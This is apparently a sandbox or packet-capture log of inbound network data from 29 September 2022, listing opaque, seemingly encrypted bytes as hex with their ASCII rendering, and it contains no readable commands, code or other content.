                                                                                                                                                            2022-09-29 12:45:15 UTC24181INData Raw: 8a 99 13 07 91 c9 26 44 72 46 ba 85 4b 5d 2e fc fc 4e c6 27 bf cc 95 44 9e d8 fd 64 95 9e 15 0f f8 24 bd 53 2b b0 ea e1 4d f8 ed 19 e8 86 52 88 cf 89 f4 33 bb 2c 73 59 7e 5e ef 39 76 0f 9b de 89 63 2e 3a 13 e1 2e 3c 7b b9 de 34 16 76 02 ae e6 32 cf 66 09 f4 a5 ae 3f c4 a1 33 cf 74 a2 8a 45 84 23 83 fb 9b 7a 4c ef 12 6c 0a 12 b5 c5 72 b0 ad e7 f3 7f 43 f6 02 c7 64 90 79 a5 d1 e4 01 db ca 4e 7a 89 80 1e 0b 14 8f 11 24 84 28 4f f6 46 f0 04 93 2d e4 2c 2a b4 b0 19 8a 88 58 77 91 10 ec 6a da 5b a2 77 91 3f 9b 3f e1 e3 2d 43 1d 46 01 e8 07 21 7f f0 d6 78 70 5e 92 a3 75 63 e9 8f 67 f2 52 c5 a1 93 22 8d 22 56 a6 aa 62 1e 0d ec d0 6e 8a 6c 52 fa 9b bf 1f 35 6e f7 19 bf 3e 99 fb 21 76 f7 af 51 e2 4c 9d 4c 12 9a dd 42 28 93 57 08 35 90 c6 20 0a 2d e1 63 e4 8f c4 c7
                                                                                                                                                            Data Ascii: &DrFK].N'Dd$S+MR3,sY~^9vc.:.<{4v2f?3tE#zLlrCdyNz$(OF-,*Xwj[w??-CF!xp^ucgR""VbnlR5n>!vQLLB(W5 -c
                                                                                                                                                            2022-09-29 12:45:15 UTC24197INData Raw: 57 7d 35 78 6f 77 e2 df f5 a0 7d 19 be cc 5c 9e 62 da 6d d9 12 1b 2f 66 9d bb 27 91 45 db 12 36 91 76 34 8f 17 02 f7 65 83 76 7c 4a 98 dd 36 2f 0f 7b 84 06 d3 0c 8f 2c 4f 43 b1 58 5b 7a 64 06 bd ad a0 be d4 e8 5d c1 da 49 f7 a5 50 96 47 fb 08 4d e1 3b 2a bf 60 ff ba 4d 5e 06 16 01 4b 22 24 25 8f d2 65 95 43 a4 74 d1 04 b5 fb d6 f5 e7 f1 41 0e c0 89 bd ec 53 37 1f df e8 d4 d7 16 1a 67 b1 e5 19 0f c1 a3 27 72 f2 27 5c bc d6 17 ab 00 94 63 ed ea 19 07 ef 95 64 17 de 44 25 4f 03 d2 43 fe 3f 40 75 0e 68 14 fb ba 90 d8 84 a1 95 08 f3 75 96 ae 77 b2 87 b2 20 6a cb 4f c3 05 d3 53 34 44 52 66 13 68 00 44 22 c2 f3 2c 93 2a 70 85 59 89 37 84 89 9b 23 d0 22 66 c9 05 63 d6 1f de ee 5f f5 a8 aa 4a 05 41 17 77 9b c0 4c d5 9c 83 f8 eb fb 14 a2 16 d4 58 c3 7c 44 d8 4a b2
                                                                                                                                                            Data Ascii: W}5xow}\bm/f'E6v4ev|J6/{,OCX[zd]IPGM;*`M^K"$%eCtAS7g'r'\cdD%OC?@uhuw jOS4DRfhD",*pY7#"fc_JAwLX|DJ
                                                                                                                                                            2022-09-29 12:45:15 UTC24213INData Raw: 13 87 87 11 f6 0b 08 2f a4 bd 09 5e 1a 7a 13 33 77 b1 ad 90 3d b4 e5 44 a5 9b ab 3e 18 e2 10 e4 d0 9b 3b 68 4d b7 3f cc 07 5e fb f0 ef 77 5e b6 0a 59 f1 b7 2b 4c 00 87 21 8b 2f f0 b4 28 7c 5b 66 6d e1 9c dc 19 25 c9 db d5 be 94 89 af ae 35 b0 6f df d9 b6 11 85 77 80 2f e9 b0 7b 77 65 88 23 06 bd 92 06 32 45 2a 60 e9 c8 f9 cf 80 22 ae 99 9c a9 92 5f fa c2 ef bd 64 48 d3 10 87 fc 13 89 23 58 25 1e e1 82 06 2d b1 e9 4f db 40 5d 60 50 d0 fa 59 25 bc 69 01 7d 32 93 59 37 13 33 a9 ba 3a f8 ee 1c cd 64 c2 76 6d da 49 93 e1 eb d5 97 37 04 50 93 aa 5f 82 b0 fe 83 3f 3a bd 0d c3 3a 4d 31 c5 67 4e 8a e0 24 9c 61 72 2d b4 0b 44 a6 93 11 6f f4 ec b6 03 15 c4 8d fd 74 0f 53 8a 41 de 25 a8 90 74 fc 34 b7 87 4a 49 8c 58 03 c3 a2 58 1f ed f6 d1 63 37 69 91 7e d1 70 69 cb
                                                                                                                                                            Data Ascii: /^z3w=D>;hM?^w^Y+L!/(|[fm%5ow/{we#2E*`"_dH#X%-O@]`PY%i}2Y73:dvmI7P_?::M1gN$ar-DotSA%t4JIXXc7i~pi
                                                                                                                                                            2022-09-29 12:45:15 UTC24229INData Raw: 48 9d ac 7a 02 7f 73 22 37 8b 8c 7f bd 03 5c ca fa 78 d0 8f 45 a7 14 b4 ba bf 17 6c 25 d2 2d 1c 5e 5f 20 22 6e 11 50 1c 84 59 f2 4e 1f 6b dc f7 94 99 ef 80 fd df 07 59 0a 51 18 c5 7d 5b 5b 3c c0 27 42 7b 30 0e 65 32 26 2e dc 62 80 a1 a3 20 f3 ad 23 0c 73 c9 40 e5 04 6b f9 79 fa 9d e2 1c 32 07 73 33 ad 5d 66 83 76 1d c3 29 92 7d 8a 31 df a3 66 97 e4 8d 18 d7 40 db 08 2d a2 e3 df a0 c7 b3 aa fa 36 fe 96 c9 ee a5 b9 de 1e 1b 99 5c d7 c1 13 a6 45 7a 79 5d dc 20 08 1d e7 25 3e 2a fb 84 29 cb d1 3c cd 31 a9 46 fd 72 b2 c1 92 cd 74 e5 c7 dc 63 92 db 79 a9 77 87 3d cd 56 79 11 6e 2e ee 01 7b 4f 0e 76 34 fe fe 73 4c 5e bf 5b 20 30 2c 81 d7 5a 89 f8 5a 3a c2 e2 5f fb 4e 58 1d 48 5c 4b 99 79 4f d0 c6 35 13 6e 4a 27 01 ba d3 2f c6 65 2e 3c 56 03 d7 03 4c c2 6a 21 e3
                                                                                                                                                            Data Ascii: Hzs"7\xEl%-^_ "nPYNkYQ}[[<'B{0e2&.b #s@ky2s3]fv)}1f@-6\Ezy] %>*)<1Frtcyw=Vyn.{Ov4sL^[ 0,ZZ:_NXH\KyO5nJ'/e.<VLj!
                                                                                                                                                            2022-09-29 12:45:15 UTC24245INData Raw: ac 75 7b db 36 2b cb 54 67 ee 17 a5 7e 56 ce 62 13 bd 8d 06 67 cf 07 12 f7 0a 02 40 d0 7d 05 cf c9 d0 68 c6 35 75 9f ac 39 77 31 95 be bb 6a cb be eb f8 47 0e 39 a6 33 1c 1a db 65 74 10 3a 18 76 ee cb 91 77 5e e7 cc 61 6e d4 92 73 61 00 51 28 0b 3b 2a 75 10 4b 2a da 74 49 2d 1a 10 49 c7 10 75 50 aa 2a 70 5b 7b 70 a9 12 ad 23 ab 4a 99 91 36 e4 84 db 7a ed 75 a3 cb 5c 87 71 00 12 e4 5d de be e9 29 2a 3f ff 00 a3 0c c3 7f 43 a0 11 c2 72 df ad 3e 1f 94 1b 00 f4 73 fa 6a 66 4d f7 41 47 03 85 b4 d2 dd 58 8e 1d 14 ba 16 cf 56 1a 56 68 7b 1c 34 a0 af d3 2f 29 c9 72 d0 ff b6 40 f3 9f 90 6f 69 79 c3 21 66 a9 c1 9b 7d f5 07 0b 95 3d 10 b8 35 0a f2 85 37 bc 2c a6 5e dc fc ef cf ed ad f6 d3 3b f2 bb f6 5e e3 aa 07 53 88 42 ec 24 f2 54 1c fd c7 ea df 50 5e 19 41 25 4c
                                                                                                                                                            Data Ascii: u{6+Tg~Vbg@}h5u9w1jG93et:vw^ansaQ(;*uK*tI-IuP*p[{p#J6zu\q])*?Cr>sjfMAGXVVh{4/)r@oiy!f}=57,^;^SB$TP^A%L
                                                                                                                                                            2022-09-29 12:45:15 UTC24261INData Raw: 91 a9 79 fe f1 07 a8 33 f0 55 5a b3 a0 b5 fc a7 5b 97 53 71 93 a2 76 15 cc d5 21 db 58 28 74 26 6f a7 17 88 5d 57 99 08 67 13 24 c2 68 7b a7 91 f4 eb 0b 84 dd 66 3c 20 c7 fe 42 f2 ee db 77 63 6a 68 d8 7d 73 90 5f b6 c4 d2 3c cd b3 68 19 7d 93 34 91 09 8e 8f e4 9d f7 06 bf 9d 41 44 fe 66 39 8f 86 c8 ae d9 20 51 c2 e1 82 3c 00 64 4a 68 ce f1 9a 89 81 a6 1e be 56 eb c3 5c a6 1e 17 c8 16 4d f4 e4 92 38 c6 b4 b3 70 76 7c 7e f8 e9 31 7b 85 05 d9 91 30 c9 1e 72 75 c9 7c cd 26 cf 3e 91 ea f5 c7 0a 86 25 da 46 6a 5c c3 ea 61 bd 3c 4b 9e c4 36 ff 86 16 7a 32 5f 9b 6e a6 3b 02 9e 84 9e e6 30 68 c1 fd ba 23 c8 7c ea 34 0b 7d 0a 06 d6 70 e8 8a 29 1c 8f 76 c4 e4 69 b3 91 c5 d6 4f d3 67 fb 7a 7a cc 78 06 b1 dc d1 96 f5 6c a2 87 06 cd e4 b2 a9 21 b0 61 e3 95 89 71 98 af
                                                                                                                                                            Data Ascii: y3UZ[Sqv!X(t&o]Wg$h{f< Bwcjh}s_<h}4ADf9 Q<dJhV\M8pv|~1{0ru|&>%Fj\a<K6z2_n;0h#|4}p)viOgzzxl!aq
                                                                                                                                                            2022-09-29 12:45:15 UTC24277INData Raw: 16 47 c4 aa cc 89 da 39 4d 99 74 d2 d1 3f 55 33 b1 af 22 bd 12 86 6b 7f 7b 42 d4 9e 3e aa 53 ea b3 83 23 34 dc 9a f3 f1 f4 1d 57 d1 32 6f 85 ca ab 44 1f 81 61 7e 43 9c 5f 6c 43 b8 2d 97 94 6e 0f b1 f6 94 96 e6 af ca 0b 43 28 5e 30 0c a7 85 40 33 cb 5c 7d 24 ca 78 28 e7 97 cc 7e af fa 45 2c 8b 99 6b a3 a0 ea df 70 8c 89 45 2d dc ce 34 6d 06 93 ba a6 f8 76 ad 27 60 c3 09 b6 9c 23 9e 16 67 e1 63 fc 98 0b a3 85 6c 56 f6 91 2d 2f 82 1c 17 9f af ee 28 5c 73 ee 6c fc 6a 3b 41 27 55 0f 99 a0 30 dc fd f4 cb 5d e7 d0 8d 0a ca a3 ce ab cd 26 27 24 e2 12 c8 e2 70 2a 20 62 9c 61 1e 34 98 56 bc 8e 5c f2 70 93 c3 d5 f2 0d d9 8d bd 2a a4 6c f9 b8 37 d8 4b 3c 9c e7 8f df 1b 79 2e 6b 71 ae c4 32 30 3b 8c 04 3a a6 2c 0d 71 f0 ee ba f8 ab 7a 54 1f b3 a0 3f 0f 56 0f c9 56 02
                                                                                                                                                            Data Ascii: G9Mt?U3"k{B>S#4W2oDa~C_lC-nC(^0@3\}$x(~E,kpE-4mv'`#gclV-/(\slj;A'U0]&'$p* ba4V\p*l7K<y.kq20;:,qzT?VV
                                                                                                                                                            2022-09-29 12:45:15 UTC24293INData Raw: 3d 6f a5 53 b8 d1 46 0a 66 8b 1a fa 29 73 82 7b dc 48 f1 e0 ed ef 0b 18 13 44 f2 93 e8 12 82 d1 8d a5 c6 6e 27 70 d0 3f 7f 11 9d f0 e3 d7 eb 70 42 75 5f 8a 19 5b b1 49 ec ac c7 34 29 69 3d c7 94 7f 70 d0 71 6c 38 ba 21 a1 2c 4b 6c 4a 70 57 30 91 cf d9 fc 20 e5 1c fb 5b d4 a0 c2 1a fa 9a 4f 89 3b 95 cf fb a0 a2 a8 6a b3 cb 45 58 93 64 73 35 fb 53 ae 7a e3 5f 2c 83 dc 18 75 d0 19 cf 5b 9b ae c8 7c 58 77 05 3e 7c 56 b0 d7 51 e4 34 ad f7 46 0b dd 3d 9b aa ad 16 ec 10 6b 00 f1 09 61 57 01 f5 e3 ce 57 46 a6 17 37 8b 00 87 8b 6f bd e6 79 ca 35 a0 21 78 79 f8 02 6d 8f d3 7f f3 4f 3d 19 7c 52 de 16 73 f2 86 ac 87 88 51 d1 ff 97 2d 2d 18 2e 71 7e b7 9f dc 6b 83 5a ee 5e 18 76 bf 9f 6d 4d 8d 51 b6 a3 d4 23 f3 1d 14 88 ad de d2 04 97 e7 82 e5 5c ab eb c1 c1 55 0e c7
                                                                                                                                                            Data Ascii: =oSFf)s{HDn'p?pBu_[I4)i=pql8!,KlJpW0 [O;jEXds5Sz_,u[|Xw>|VQ4F=kaWWF7oy5!xymO=|RsQ--.q~kZ^vmMQ#\U
                                                                                                                                                            2022-09-29 12:45:15 UTC24309INData Raw: 1c 4f 36 c9 5b ef d0 58 05 97 d0 ac df c6 78 ba 00 83 85 04 bd 73 5d c8 9c 09 91 77 48 cc 38 1f 43 93 64 e2 60 5b 2a 0c 6c 08 b0 f2 0b 96 40 90 b2 fb 42 18 06 fc cf 95 da 78 c6 5f c7 f9 75 04 e3 dd b4 52 e4 ab 65 e7 e5 84 89 e6 8b 44 b7 5e 08 93 01 1b 40 21 7c 6a d0 34 87 f5 63 6c 5f 59 17 54 fa 0f 1a 44 f1 e9 88 99 ba f5 4e 52 82 06 60 d9 7a 71 62 5d 1b 0d 89 aa 71 b6 5d b7 05 64 3a 3e d4 b2 d8 d7 66 9f df 80 94 5a b3 99 75 af ac 71 57 98 56 b8 94 b3 ca ee 99 38 2b b2 c6 b2 ba 0d 9e 3c 92 12 7b 07 bc 24 ae c3 02 f4 04 8a eb ee eb cb be 8a 9a a5 29 7f 02 fa 7b 06 f1 dd e2 15 09 78 da 46 15 a8 1b 8b 89 0c 43 dd 01 0b 9b 06 54 af 9a 68 e6 b8 ae c2 41 be c8 e6 aa a2 81 ed 03 74 42 3a ca 2b 2a 65 56 b1 d6 0c 3d 29 48 3e ae 75 62 29 0f 7c 35 a6 15 84 d5 d8 6a
                                                                                                                                                            Data Ascii: O6[Xxs]wH8Cd`[*l@Bx_uReD^@!|j4cl_YTDNR`zqb]q]d:>fZuqWV8+<{$){xFCThAtB:+*eV=)H>ub)|5j
                                                                                                                                                            2022-09-29 12:45:15 UTC24325INData Raw: 1e 34 87 9b 3d 6b a8 68 e1 69 93 15 cc 62 8e 0d 3a ff 16 44 ed 16 ec fa 58 ff e2 33 90 8e e8 5c 80 55 bf 9e 5a fb 92 a7 6e 8b e9 9e 97 d6 b0 82 53 3c 26 4b a4 cd 69 b0 98 ef 66 e7 f0 39 28 3b 79 4a e4 8f aa d5 cb 10 3f 5a f8 22 0b d8 37 72 26 a8 3b 10 02 b4 56 4b 9b 1b e2 fc 2d e5 39 29 d1 d6 1f c8 7d 1b 6a d4 bc 46 b7 75 7a 46 17 cb 98 d1 b5 3c 65 26 68 03 1d e7 e4 f5 e7 15 13 94 0a 63 cd 01 ab 61 72 62 a4 84 b0 41 d2 bf 98 07 04 8f 19 c0 89 2d f6 49 af b6 a5 66 57 a7 eb 83 6b 87 03 e8 88 d4 8c 4e 72 6a 61 e6 24 67 41 8b 39 da 4e 2c 3e 46 9c 1c 8b 9b 10 cc 2f 49 13 2a 32 77 d4 6f 02 ff 73 80 4d ee ab 2a 53 d5 2c 65 97 2a 2c 9e 59 88 07 d1 d5 c2 9f 75 1b 8d 00 2f e3 cf 3a c4 9d 2c 55 c8 64 46 0c a0 30 5c c0 a1 6c cd 7a 85 cc bb 4b ca 48 c2 52 02 77 5e 18
                                                                                                                                                            Data Ascii: 4=khib:DX3\UZnS<&Kif9(;yJ?Z"7r&;VK-9)}jFuzF<e&hcarbA-IfWkNrja$gA9N,>F/I*2wosM*S,e*,Yu/:,UdF0\lzKHRw^
                                                                                                                                                            2022-09-29 12:45:15 UTC24341INData Raw: f3 18 8b 49 0f 35 cd 91 07 9f 91 98 0e 3b 1e 86 36 27 28 d8 ce 7a b1 c0 cd d7 73 34 9e fb e2 95 f9 14 79 82 3d 5e 30 76 12 83 7f 38 84 9d 2f 2e be d9 48 56 80 08 90 da 6a 3f 89 2b 44 2d f6 b3 28 50 aa d0 0e 8b 2a f4 1d f9 77 96 e0 f7 40 f3 0b a2 2d 1d 97 46 4d ee ce 72 04 99 cf 6c ba 38 ac 0a ea 45 6f f4 71 24 b3 ed 38 f8 52 72 33 ba 9b 69 00 d2 31 0b 2e be 86 20 6d 04 78 bd fb 11 88 83 40 3d fa 2e df 05 5d cd f7 bb dd 2d c8 aa 72 d8 7d d3 07 ae f8 93 9e a4 4d 45 af be f8 f3 06 f7 06 71 a6 a3 8c 90 61 5e 06 01 88 3d b7 19 5f d6 aa 10 15 8b 74 bf fe f2 10 54 2a 05 a6 4a 8a 56 93 fc 20 c2 ec 58 5c 81 84 d4 b2 a8 05 96 0c e8 d9 aa bd 9c 24 7c cd 1d 09 f0 b8 78 6e ba da 2c e8 44 7a ba f5 22 73 b1 70 13 27 7b 07 49 5d 96 ed ad fa 19 33 72 82 22 64 13 95 95 a4
                                                                                                                                                            Data Ascii: I5;6'(zs4y=^0v8/.HVj?+D-(P*w@-FMrl8Eoq$8Rr3i1. mx@=.]-r}MEqa^=_tT*JV X\$|xn,Dz"sp'{I]3r"d
                                                                                                                                                            2022-09-29 12:45:15 UTC24357INData Raw: 5d 47 92 8c eb a9 90 6a 09 67 bc 1d ee 39 73 2b ed d3 b6 90 4e 35 0a 05 3d 90 ee 5c d2 37 fd 32 b7 cc 4f 03 92 4e 9c 66 a6 35 46 6a e9 3e ea 21 c2 5f df ab 86 4c da 6c 3a d0 4a 65 f2 04 1e 9d 1a c8 6b ee 88 c0 b8 af 09 60 49 8f 3d 69 91 db 2a 10 f5 be 0c a0 fe b0 39 27 33 51 84 d2 c4 38 13 b8 a2 a4 01 f3 90 76 af 3a 21 01 ad a0 d7 dd e1 dd ec bc 8f 29 41 06 96 be 90 53 56 0f b3 2b 8a 92 fb 89 23 2d e8 2e fd 4e fa 46 da bd 06 af cb bf df f0 56 ad 25 46 4a 5c 7a 23 1e 07 70 86 8c 84 5a 12 40 79 d4 14 e1 81 82 1c 94 3c 49 1a 2d 4b d3 15 b2 66 8b 4f 7b 62 ee 82 30 35 f2 3a 38 52 ae 91 fd d5 1c eb d1 f7 77 20 c0 fe 0b d0 ff 3c fe 94 48 22 d3 64 54 24 72 61 c4 4d d7 83 d9 5e 4e 7d 47 f6 d4 79 40 ea 3d 94 55 21 8e bc c7 3e 7c 57 41 02 fd 43 ed 0c 6d ab f7 03 da
                                                                                                                                                            Data Ascii: ]Gjg9s+N5=\72ONf5Fj>!_Ll:Jek`I=i*9'3Q8v:!)ASV+#-.NFV%FJ\z#pZ@y<I-KfO{b05:8Rw <H"dT$raM^N}Gy@=U!>|WACm
                                                                                                                                                            2022-09-29 12:45:15 UTC24373INData Raw: 52 e5 04 4b ad 65 fb db 37 d6 5c fc 90 93 ef 38 b1 54 0c 8f da 6f 08 60 62 38 b8 6e 04 ab ae d0 e8 b8 17 d5 87 d9 04 38 41 ae 13 5f 45 ee f5 e5 50 03 ef a5 38 23 16 b7 c9 59 f8 b6 0c 8f 50 e8 15 97 9b a1 72 cc 16 ad ff 04 e0 42 fc 5e 1e 80 89 72 4c 92 62 8b 9e 19 ae 43 92 a2 4d 47 ab f3 53 2b 44 7d 98 6f f9 18 32 bb d7 f0 15 76 a5 3d 5a 11 7e 3a 22 85 cb 0c 70 e4 bd 89 5c a8 81 37 06 42 99 8e 7b 74 ef 12 08 1a b0 9b 3c 43 c9 64 e4 61 80 1d cb ed da 35 fe 4e bf 6b c1 c4 05 ff f0 0c 38 b9 c8 d8 68 ac 0e 8a a1 0a 04 95 56 fb e1 37 cc 15 a9 fa 58 4a 61 4f 2a 00 3d 5d 9a ce 62 83 c3 c7 35 66 3b c9 e0 e7 7f 66 24 6d d7 a0 4d f0 31 93 34 f5 c6 67 c6 ac 53 08 fd 93 da d3 df 31 c4 f6 58 16 8a ec e8 39 a7 96 32 aa 96 65 9c 7e d7 c9 8b a1 8e 2f d1 78 a3 fd 23 ea e1
                                                                                                                                                            Data Ascii: RKe7\8To`b8n8A_EP8#YPrB^rLbCMGS+D}o2v=Z~:"p\7B{t<Cda5Nk8hV7XJaO*=]b5f;f$mM14gS1X92e~/x#
                                                                                                                                                            2022-09-29 12:45:15 UTC24389INData Raw: 1d 50 b4 9e 23 68 4d 36 74 5b eb 7d 11 df bf 21 f8 8f 53 ae 9a 10 90 e8 35 37 dd 6b 3b 2c 86 f4 9b 9c b4 1c 19 d3 33 0d 98 ec 98 26 f4 06 55 50 f9 bb 68 dd e9 60 4f 53 a7 29 6b 6c 33 92 bf 41 f4 39 1e cb 63 cc a4 54 99 ad bd 74 55 67 d6 99 32 ca 39 41 37 e0 04 d4 56 97 a0 9b c3 e9 98 1e 9d fb 8a 70 90 79 35 aa 93 30 6c f8 dc e9 c7 e4 a2 88 fd 5a d0 11 3c 6b 38 d4 b3 fd 1c dd 99 1b 2e 65 f2 19 3a ac cd cc 40 82 89 99 66 4a c4 2d ab 07 b4 89 32 28 40 fa db 8a be 90 76 ea 46 d9 0f 07 c3 4a 07 2e b0 5a 44 f3 a8 88 4f 29 9b 16 90 d1 db b8 7d 68 09 91 74 f1 8d 0e 67 58 3e ac 81 3a 13 79 71 78 74 05 86 02 28 68 32 3b f4 fb f7 81 32 01 bc be aa 35 b5 df 25 37 d2 c6 84 10 68 77 6a 46 84 0c b5 ff 19 97 9b 73 72 74 0f 8e a7 2a e9 fa 36 51 f3 10 f0 90 c6 ae b8 01 68
                                                                                                                                                            Data Ascii: P#hM6t[}!S57k;,3&UPh`OS)kl3A9cTtUg29A7Vpy50lZ<k8.e:@fJ-2(@vFJ.ZDO)}htgX>:yqxt(h2;25%7hwjFsrt*6Qh
                                                                                                                                                            2022-09-29 12:45:15 UTC24405INData Raw: 37 dc ff c3 30 db f2 68 10 ab 20 e5 be b1 ba b7 91 83 d6 47 ba 74 c9 dd fb 5f a0 4a 6e 38 ad f5 a0 38 d6 41 23 68 b7 05 e6 fc a1 52 14 f6 b0 08 3c 12 f6 81 3f e2 a6 25 59 bb 79 ad 95 31 53 aa 40 71 d0 39 48 da 9e 8c 21 06 1e 6d de 13 da 11 c3 e4 9e e4 81 78 e3 f5 38 cd 36 35 c2 f7 cb 34 46 65 1d cc a0 43 c0 a8 3c b8 a5 fc cf 22 9d 23 7b 6e cb 23 fb 8b 61 a2 8e 33 6b 1b a0 76 34 de 0c 80 74 a1 e2 5d ef 0a 3c aa 9c 75 47 ad 2c 68 e5 9f 04 14 1e 61 dc 43 40 80 1d 18 76 bb 6f 32 4d 32 73 1c 1f 5d 6a 09 a2 c7 37 4b 5a e7 01 0a c3 03 96 41 8d 5f f4 49 c7 ea 31 3c ae 20 bd 57 af b7 43 0c 32 e4 0d 7b 6d 79 23 3b 94 76 bc f9 2d 46 38 12 18 b2 fd 30 7a 41 23 3a ce ca 5d c4 e0 0c d1 f2 bb 53 55 01 1a cf 74 76 9d 7f ce 4d bd 58 e3 d0 23 f8 0a b5 92 9e 4a 8b 3c 27 af
                                                                                                                                                            Data Ascii: 70h Gt_Jn88A#hR<?%Yy1S@q9H!mx8654FeC<"#{n#a3kv4t]<uG,haC@vo2M2s]j7KZA_I1< WC2{my#;v-F80zA#:]SUtvMX#J<'
                                                                                                                                                            2022-09-29 12:45:15 UTC24421INData Raw: de 74 4b b6 c7 72 67 43 b8 c0 34 06 c2 a2 3d b4 35 db f6 d8 a3 3e 55 ec 0e 0b d0 99 c6 c5 5f 30 1c e5 91 35 4f b8 46 e8 f6 4a 3d 64 a0 d0 fd 7f fc 8c 8e 6b 96 2e 8a 6e 92 7c 3d 00 92 de 33 37 6e 67 65 19 fc 0f 52 8b d6 83 ae 6c 23 9a 1d a1 c7 10 9b 80 0b 2e 80 c9 75 ca 16 fd 17 74 fd ca 5d 19 5b 81 ca cc 90 40 2f 2e c9 17 8f 2d b4 b0 45 1b 9e e1 a6 79 e7 9c 17 7a 0f 36 24 6b eb 26 39 8a cf 97 5e 97 10 cf 31 6c 47 d8 d8 b1 b4 84 f4 19 0a eb ea b2 bd ea 44 17 2b 8e 41 bb c7 ca 94 cf bd 89 07 5b 02 d0 e6 9d 63 6a cf a6 35 e2 d4 a6 5c dc 1e c5 9f c9 a0 97 90 c4 3c d7 c6 1a 54 10 ce be 71 5e f7 90 16 a9 16 89 17 b6 50 85 ba 15 ac e8 ca 12 45 a0 af 3a 65 46 4e ee 5d 69 32 a0 03 22 58 0b 00 96 1b 4e 5e e6 43 c0 1c f5 12 cc dd 73 e5 25 bb fd 89 ab f3 71 32 0a 1b
                                                                                                                                                            Data Ascii: tKrgC4=5>U_05OFJ=dk.n|=37ngeRl#.ut][@/.-Eyz6$k&9^1lGD+A[cj5\<Tq^PE:eFN]i2"XN^Cs%q2
                                                                                                                                                            2022-09-29 12:45:15 UTC24437INData Raw: 1b a2 8e 1e 52 c1 36 85 b6 03 aa 9c 14 4a 04 fd e4 89 a8 e8 c6 05 a5 92 a5 59 80 a7 b3 36 ab 04 60 32 1f db 21 03 13 ff 81 e0 ca e9 66 23 53 b0 8d 51 e2 1a 32 13 42 e1 44 ed ed 89 26 bf 81 ae 7e 34 98 99 f9 21 13 79 ab 4b b9 50 d1 d3 e3 a3 7a 9a e2 50 cc 70 70 60 74 86 e7 96 33 b2 25 a3 73 df cc 15 78 af a0 00 21 dd 44 ce bc 94 48 0b 64 df a8 f0 87 39 5f 3f 12 b8 88 5b 9c b0 ce 47 69 cf 4f 7e 20 69 38 96 f3 95 ca 2f 20 66 1f 02 36 db 6b 41 7b b8 38 16 e5 90 b7 28 81 b9 69 42 33 a0 26 2d 91 51 18 61 e2 ed ba a4 7b f5 0d 5c 86 01 1b c5 42 5f 78 ac f2 22 8e 36 f9 ec b4 d7 07 e6 dd 04 d7 19 7c 02 7c 6b 6f 0d 20 ea 06 aa 02 75 be d9 5d c0 b7 7f 05 2a 7b 5d 8d 01 20 6d 04 e4 37 12 af 92 da 68 21 38 47 1c 96 c3 7c 55 02 df 4c f3 43 b4 5a 26 fa c7 36 c5 cc 3c 71
                                                                                                                                                            Data Ascii: R6JY6`2!f#SQ2BD&~4!yKPzPpp`t3%sx!DHd9_?[GiO~ i8/ f6kA{8(iB3&-Qa{\B_x"6||ko u]*{] m7h!8G|ULCZ&6<q
                                                                                                                                                            2022-09-29 12:45:15 UTC24453INData Raw: df 3f b1 69 10 9b 6e a7 8e e0 e2 78 cb b6 01 e4 53 b2 c2 51 c5 86 34 14 7d bc 04 b3 fa 48 0f 7e 3b 3a 1b 1e 28 3d 43 75 e5 65 04 bb c8 46 53 4d 8c 0a 85 97 a4 f9 2e 55 ba ae ad a1 28 fc 08 7e 4c 2a 8d 44 38 53 e3 b6 cb 50 18 2c 0d 2c ef e4 35 21 ca 51 b7 65 b9 fe d1 97 ec e4 03 6d ff 03 d4 25 d2 68 76 bf 8a bb 44 08 89 b1 14 fc 69 57 ce 88 7a 64 a2 9d 4c da 52 63 00 cd d0 4e 1a 2f 17 a1 6a 5b 83 29 70 5e 99 8d e2 ed 9b 0f 8e 59 99 56 a3 d7 f0 fa b8 3a 3a f5 a3 a8 ee c8 e5 af 29 b5 b4 e5 c6 24 f6 68 9b 94 77 a3 d7 80 9e fa 4b b3 9e 54 1d bc 5f 1b fd 1d 8b 70 cf 0f 39 dd 9d 54 fb 74 3e a4 43 9b 35 37 7f 99 d3 62 2c da 04 d8 5d 42 ab ae 18 a6 1e 16 1c 64 19 b3 63 bc f3 7d 7e 73 4c 61 f1 57 66 06 5e c7 1a af a3 e6 79 12 2b 93 44 b9 bc 21 40 a3 6e 9e 5a f7 7c
                                                                                                                                                            Data Ascii: ?inxSQ4}H~;:(=CueFSM.U(~L*D8SP,,5!Qem%hvDiWzdLRcN/j[)p^YV::)$hwKT_p9Tt>C57b,]Bdc}~sLaWf^y+D!@nZ|
                                                                                                                                                            2022-09-29 12:45:15 UTC24469INData Raw: 96 90 22 1d a5 95 7c aa 2c 45 21 7e 7e b7 51 c2 f1 13 14 e3 22 fd 54 02 2c 84 c8 f9 25 4d 65 08 4d 7c 09 91 b5 26 78 4d eb f8 b6 8b 2e c9 00 cd 7c 74 68 31 7b 31 2f 01 d2 f6 42 7d 84 87 d9 ee fd 55 20 d2 2a 32 73 91 ff 92 ff 1c be ae bb 7f 67 23 f5 ea 0a 05 e8 fe 9a cd b2 f5 86 64 fe 93 5d e0 d2 86 16 81 55 74 f7 f9 62 10 3f 96 4c 87 f0 68 c0 06 f9 13 60 bc 34 4d 9e da dd f9 66 76 72 e5 41 89 99 a2 f5 42 83 13 28 53 b0 85 6d 1e ec e8 0a 23 0f eb 6c b2 9c 78 1c c0 6b 24 63 dc 89 9e 28 84 f2 6e dc d0 64 c1 68 b7 67 75 50 28 64 20 55 27 76 0a 40 9a f2 97 ab d2 f2 78 c8 d9 f6 16 f5 f0 83 64 3b d0 56 af 4c c6 6a bd ae e9 97 af d8 07 bd 1d 2b 10 9c fa 91 2e a0 d7 91 45 b1 ad d0 37 72 c0 6d 45 4e a9 85 3c 77 d2 ab 45 de ae 17 87 d3 27 be 50 73 a4 87 e4 14 1d 64
                                                                                                                                                            Data Ascii: "|,E!~~Q"T,%MeM|&xM.|th1{1/B}U *2sg#d]Utb?Lh`4MfvrAB(Sm#lxk$c(ndhguP(d U'v@xd;VLj+.E7rmEN<wE'Psd
